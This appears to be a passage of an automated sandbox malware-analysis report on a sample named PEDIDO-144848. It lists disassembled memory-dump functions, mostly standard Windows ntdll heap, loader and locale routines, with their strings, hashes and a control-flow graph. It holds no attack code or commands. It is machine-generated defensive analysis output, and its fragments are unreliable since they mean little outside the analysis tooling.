                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 36C752ED
                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 36C7534E
                                                        • Thread identifier, xrefs: 36C75345
                                                        • undeleted critical section in freed memory, xrefs: 36C75236
                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 36C75215, 36C752A1, 36C75324
                                                        • Invalid debug info address of this critical section, xrefs: 36C752C1
                                                        • 8, xrefs: 36C750EE
                                                        • Critical section address, xrefs: 36C75230, 36C752C7, 36C7533F
                                                        • Critical section debug info address, xrefs: 36C7522A, 36C75339
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                        • API String ID: 0-2368682639
                                                        • Opcode ID: c8ca0003d97ab1c760901c3030d2264d82f774d3572278417de6075e947d3e66
                                                        • Instruction ID: e30ee9957983358b58d870b3e57dd4264b2bc054d92bf4302899d0dc8a1ec5b6
                                                        • Opcode Fuzzy Hash: c8ca0003d97ab1c760901c3030d2264d82f774d3572278417de6075e947d3e66
                                                        • Instruction Fuzzy Hash: AE8159B1901758AFEB10CF95C940B9EBBB9FF08714F60415AF904BB281CB79A945CFA0
                                                        Function 36CAFDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 901 36cafdf4-36cafe16 call 36c57be4 904 36cafe18-36cafe30 RtlDebugPrintTimes 901->904 905 36cafe35-36cafe4d call 36bf7662 901->905 909 36cb02d1-36cb02e0 904->909 910 36cafe53-36cafe69 905->910 911 36cb0277 905->911 912 36cafe6b-36cafe6e 910->912 913 36cafe70-36cafe72 910->913 914 36cb027a-36cb02ce call 36cb02e6 911->914 915 36cafe73-36cafe8a 912->915 913->915 914->909 917 36cb0231-36cb023a GetPEB 915->917 918 36cafe90-36cafe93 915->918 920 36cb0259-36cb025e call 36bfb910 917->920 921 36cb023c-36cb0257 GetPEB call 36bfb910 917->921 918->917 922 36cafe99-36cafea2 918->922 929 36cb0263-36cb0274 call 36bfb910 920->929 921->929 926 36cafebe-36cafed1 call 36cb0835 922->926 927 36cafea4-36cafebb call 36c0fed0 922->927 935 36cafedc-36cafef0 call 36bf753f 926->935 936 36cafed3-36cafeda 926->936 927->926 929->911 940 36cb0122-36cb0127 935->940 941 36cafef6-36caff02 GetPEB 935->941 936->935 940->914 944 36cb012d-36cb0139 GetPEB 940->944 942 36caff70-36caff7b 941->942 943 36caff04-36caff07 941->943 945 36cb0068-36cb007a call 36c12710 942->945 946 36caff81-36caff88 942->946 947 36caff09-36caff24 GetPEB call 36bfb910 943->947 948 36caff26-36caff2b call 36bfb910 943->948 949 36cb013b-36cb013e 944->949 950 36cb01a7-36cb01b2 944->950 966 36cb0110-36cb011d call 36cb0d24 call 36cb0835 945->966 967 36cb0080-36cb0087 945->967 946->945 951 36caff8e-36caff97 946->951 963 36caff30-36caff51 call 36bfb910 GetPEB 947->963 948->963 954 36cb015d-36cb0162 call 36bfb910 949->954 955 36cb0140-36cb015b GetPEB call 36bfb910 949->955 950->914 952 36cb01b8-36cb01c3 950->952 958 36caffb8-36caffbc 951->958 959 36caff99-36caffa9 951->959 952->914 960 36cb01c9-36cb01d4 952->960 974 36cb0167-36cb017b call 36bfb910 954->974 955->974 970 36caffce-36caffd4 958->970 971 36caffbe-36caffcc call 36c33ae9 958->971 959->958 968 36caffab-36caffb5 call 36cbd646 959->968 960->914 969 36cb01da-36cb01e3 GetPEB 960->969 963->945 995 36caff57-36caff6b 963->995 966->940 975 36cb0089-36cb0090 967->975 976 36cb0092-36cb009a 967->976 968->958 979 36cb0202-36cb0207 call 36bfb910 969->979 980 36cb01e5-36cb0200 GetPEB call 36bfb910 969->980 982 36caffd7-36caffe0 970->982 971->982 996 36cb017e-36cb0188 GetPEB 974->996 975->976 986 36cb00b8-36cb00bc 976->986 987 36cb009c-36cb00ac 976->987 1002 36cb020c-36cb022c call 36ca823a call 36bfb910 979->1002 980->1002 993 36cafff2-36cafff5 982->993 994 36caffe2-36cafff0 982->994 999 36cb00be-36cb00d1 call 36c33ae9 986->999 1000 36cb00ec-36cb00f2 986->1000 987->986 997 36cb00ae-36cb00b3 call 36cbd646 987->997 1003 36cafff7-36cafffe 993->1003 1004 36cb0065 993->1004 994->993 995->945 996->914 1006 36cb018e-36cb01a2 996->1006 997->986 1017 36cb00e3 999->1017 1018 36cb00d3-36cb00e1 call 36c2fdb9 999->1018 1005 36cb00f5-36cb00fc 1000->1005 1002->996 1003->1004 1010 36cb0000-36cb000b 1003->1010 1004->945 1005->966 1012 36cb00fe-36cb010e 1005->1012 1006->914 1010->1004 1011 36cb000d-36cb0016 GetPEB 1010->1011 1015 36cb0018-36cb0033 GetPEB call 36bfb910 1011->1015 1016 36cb0035-36cb003a call 36bfb910 1011->1016 1012->966 1026 36cb003f-36cb005d call 36ca823a call 36bfb910 1015->1026 1016->1026 1024 36cb00e6-36cb00ea 1017->1024 1018->1024 1024->1005 1026->1004
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                        • API String ID: 3446177414-1700792311
                                                        • Opcode ID: 34e12e700b0e8df7105fd6a98de207af69e232c3ebbfa97addcd496cc5e61528
                                                        • Instruction ID: 121198077691ff71f6ddaf7362e534fbed1c7033057263ebe18b8d244967a577
                                                        • Opcode Fuzzy Hash: 34e12e700b0e8df7105fd6a98de207af69e232c3ebbfa97addcd496cc5e61528
                                                        • Instruction Fuzzy Hash: ACD1D035A18685DFDB01CFA5C844AAABBF2FF49314F04809DE544AF262CB36D949CF61
                                                        Function 36CA86C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                        • API String ID: 0-2515994595
                                                        • Opcode ID: ee85eb0ea31f6851d2315bd5e82a12af5549b981b3c5009797f3c2d3b048fecd
                                                        • Instruction ID: 181f387c468115839162532aaa770f9d8e61d79988aad5699e931233c437c8a0
                                                        • Opcode Fuzzy Hash: ee85eb0ea31f6851d2315bd5e82a12af5549b981b3c5009797f3c2d3b048fecd
                                                        • Instruction Fuzzy Hash: 6C519EB59053129BD325CF55CC44A9BB7E8FF84290F50492EFA58C7240EB30D644CBD2
                                                        Function 36CAF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                        • API String ID: 3446177414-1745908468
                                                        • Opcode ID: 8e0c1ef38df8e3ec8763fc697f791817103ed3ad016fae41d87061a9e4756741
                                                        • Instruction ID: 9bcb7d681cd2e30baf747026008952d998436d67917a3538fb5050e0e5373ed0
                                                        • Opcode Fuzzy Hash: 8e0c1ef38df8e3ec8763fc697f791817103ed3ad016fae41d87061a9e4756741
                                                        • Instruction Fuzzy Hash: 289100799057869FDB01CFA9C840AADBBF2FF09314F14845EE590AB262CB36D941CF61
                                                        Function 36BF640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlDebugPrintTimes.NTDLL ref: 36BF651C
                                                          • Part of subcall function 36BF6565: RtlDebugPrintTimes.NTDLL ref: 36BF6614
                                                          • Part of subcall function 36BF6565: RtlDebugPrintTimes.NTDLL ref: 36BF665F
                                                        Strings
                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 36C597B9
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 36C597A0, 36C597C9
                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 36C5977C
                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 36C59790
                                                        • LdrpInitShimEngine, xrefs: 36C59783, 36C59796, 36C597BF
                                                        • apphelp.dll, xrefs: 36BF6446
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 3446177414-204845295
                                                        • Opcode ID: d4aaf8060f3a4ae1dc4ae89b3092f409b44331f7e2267dc8aa3586d2185aebdc
                                                        • Instruction ID: b5faf67a68e293a5dc7779da70316c2b099a70cffb6343fe7e22c517034bfdc7
                                                        • Opcode Fuzzy Hash: d4aaf8060f3a4ae1dc4ae89b3092f409b44331f7e2267dc8aa3586d2185aebdc
                                                        • Instruction Fuzzy Hash: 0051C0716087449FE310CF21CD50E5ABBE5EB84684F41095EFA94AB2A1EB31D904CF97
                                                        Function 36BFD2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                        • API String ID: 0-3532704233
                                                        • Opcode ID: e76cbb7bbf67e723263c69bc9790be1efd43f87824b27a4d56c4e69f64040d82
                                                        • Instruction ID: 70f8deb3cda56a238099c65e6cb31ad149453b63e0eff33725e859c3709f7d8e
                                                        • Opcode Fuzzy Hash: e76cbb7bbf67e723263c69bc9790be1efd43f87824b27a4d56c4e69f64040d82
                                                        • Instruction Fuzzy Hash: A1B19EB59183519FD711CF69C840A4FBBE8EB84798F41492EFA84DB220DB71D908CF96
                                                        Function 36C2D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlDebugPrintTimes.NTDLL ref: 36C2D879
                                                          • Part of subcall function 36C04779: RtlDebugPrintTimes.NTDLL ref: 36C04817
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 3446177414-1975516107
                                                        • Opcode ID: be128f62ace6e35472853f21741339925b95038e4f6c05306643dc49da0ec5f2
                                                        • Instruction ID: a76b2af785d776c48e918c920554a7bcaed0d4878823da17da2621367b5f2c06
                                                        • Opcode Fuzzy Hash: be128f62ace6e35472853f21741339925b95038e4f6c05306643dc49da0ec5f2
                                                        • Instruction Fuzzy Hash: 0D51D075E047859FEB04CFA5C9A478DBBB2FF54708F64405EDA00AB281DB74A982CBC1
                                                        Function 36BFD02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 36BFD06F
                                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 36BFD202
                                                        • @, xrefs: 36BFD09D
                                                        • @, xrefs: 36BFD2B3
                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 36BFD263
                                                        • @, xrefs: 36BFD24F
                                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 36BFD0E6
                                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 36BFD136
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                        • API String ID: 0-1356375266
                                                        • Opcode ID: 762caeb5e1c021b57097ae1e3019e5b399c8fb6d0508f2ec00ee4dc4ee372a76
                                                        • Instruction ID: 8ef1bc22190d2afe096d7944a19f4c133eda822a7b1a02ce1890729f17874e51
                                                        • Opcode Fuzzy Hash: 762caeb5e1c021b57097ae1e3019e5b399c8fb6d0508f2ec00ee4dc4ee372a76
                                                        • Instruction Fuzzy Hash: 20A17DB18187559FE321CF61C840B5BBBE8AF84755F40492EFA889A250DB75D90CCF93
                                                        Function 36CAF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                        • API String ID: 0-2224505338
                                                        • Opcode ID: 005b87e5c9f17a1634fad7e0ff800ca9eef321bf29bfd68a720b51868a8f6dc1
                                                        • Instruction ID: 5fc861340ff4865336b9b0f32a89da8bb9d0fd637f21c4959b9336bf02a9ea95
                                                        • Opcode Fuzzy Hash: 005b87e5c9f17a1634fad7e0ff800ca9eef321bf29bfd68a720b51868a8f6dc1
                                                        • Instruction Fuzzy Hash: 7A51E036525746EFE701CFA5C884E5ABBB4EF04768F10849AF411DF222CA3AD944CF51
                                                        Function 36C88633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • VerifierDebug, xrefs: 36C88925
                                                        • HandleTraces, xrefs: 36C8890F
                                                        • VerifierDlls, xrefs: 36C8893D
                                                        • AVRF: -*- final list of providers -*- , xrefs: 36C8880F
                                                        • VerifierFlags, xrefs: 36C888D0
                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 36C886BD
                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 36C886E7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                        • API String ID: 0-3223716464
                                                        • Opcode ID: ea1073e9fb43cc60949e412f5d83b3883622bf7f76c96a653c97e1dd35ff0f1f
                                                        • Instruction ID: 07fb63c33954d91df196807d0acbd4bca206ce35ea851bf18fb4a0b437b261bf
                                                        • Opcode Fuzzy Hash: ea1073e9fb43cc60949e412f5d83b3883622bf7f76c96a653c97e1dd35ff0f1f
                                                        • Instruction Fuzzy Hash: F3910271A06B61AFE721CF698C80B1ABBA5FF44718F850959FA40AF751C731D805CBA2
                                                        Function 36C2237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 36C6A7AF
                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 36C6A79F
                                                        • LdrpDynamicShimModule, xrefs: 36C6A7A5
                                                        • apphelp.dll, xrefs: 36C22382
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-176724104
                                                        • Opcode ID: a080f60acb03a37c616b1751bdbde5393b75f241787f317824547359cede501a
                                                        • Instruction ID: 0ddb7b25247a0577367615778a56bb1e98eadc6146076ffd688b326420b02be4
                                                        • Opcode Fuzzy Hash: a080f60acb03a37c616b1751bdbde5393b75f241787f317824547359cede501a
                                                        • Instruction Fuzzy Hash: D8310776E00280AFEB109F5AC8C4A5977B6FB84748F29005EEA05BB351DBB49942CB94
                                                        Function 36C1B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                        • API String ID: 0-122214566
                                                        • Opcode ID: 614ca1270c8df2c6b11f54ea697235242b988d04fab9ceb9b4a7fd97a8fbabcd
                                                        • Instruction ID: 14d0a3ae8e128e87335b4b8956cddfbc442deaec86d963e2a1b662e8c91c5c18
                                                        • Opcode Fuzzy Hash: 614ca1270c8df2c6b11f54ea697235242b988d04fab9ceb9b4a7fd97a8fbabcd
                                                        • Instruction Fuzzy Hash: BCC13674E017159BEB048B66CC94BBEBBB1AF45308F644069E801EB390EB74D849DBA1
                                                        Function 36C3631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-792281065
                                                        • Opcode ID: 2a82597d2fc80e4243617d6cb9eb38289aff6110b12f538251be88551d59d6e3
                                                        • Instruction ID: 7b84c389cf2a4495cc076de0e7d95a291116832cb8c7b29d0630c09bdac8a70e
                                                        • Opcode Fuzzy Hash: 2a82597d2fc80e4243617d6cb9eb38289aff6110b12f538251be88551d59d6e3
                                                        • Instruction Fuzzy Hash: 8E911370E067A4EFE755CB22CD44B997BA2EF40764F20406DE644AF381CB789852CBE5
                                                        Function 36C3C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • LdrpInitializeProcess, xrefs: 36C3C5E4
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 36C77F8C, 36C78000
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 36C3C5E3
                                                        • LdrpInitializeImportRedirection, xrefs: 36C77F82, 36C77FF6
                                                        • Loading import redirection DLL: '%wZ', xrefs: 36C77F7B
                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 36C77FF0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 0-475462383
                                                        • Opcode ID: dac531971fe4a584478cd177abe77d558181c9a0279d7f6e44734d6611300e73
                                                        • Instruction ID: c96f832b431b6a86cd4a255509e01d9b7b8af323ff35d7a5dc9f09491f001a5d
                                                        • Opcode Fuzzy Hash: dac531971fe4a584478cd177abe77d558181c9a0279d7f6e44734d6611300e73
                                                        • Instruction Fuzzy Hash: 57312671609B419FC214EF28DC45E2EBBD5EF84B50F010958FA84AB391EB24DC04CBA3
                                                        Function 36C32594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 36C71F82
                                                        • SXS: %s() passed the empty activation context, xrefs: 36C71F6F
                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 36C71FA9
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 36C71F8A
                                                        • RtlGetAssemblyStorageRoot, xrefs: 36C71F6A, 36C71FA4, 36C71FC4
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 36C71FC9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                        • API String ID: 0-861424205
                                                        • Opcode ID: 6378bbcf578ce7ec1d5d89ffb6a6c936327acadf0fefec34f759953dbc1dc2ab
                                                        • Instruction ID: 03fcc0808b600390db162fa507dc6d2be125681d53be92d27ad2227b84e54e62
                                                        • Opcode Fuzzy Hash: 6378bbcf578ce7ec1d5d89ffb6a6c936327acadf0fefec34f759953dbc1dc2ab
                                                        • Instruction Fuzzy Hash: 5D31E276E01224BFFB218A97AC44F5B7E68AF55694F2440A9F900A7240D738EA00CBE5
                                                        Function 36C10680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
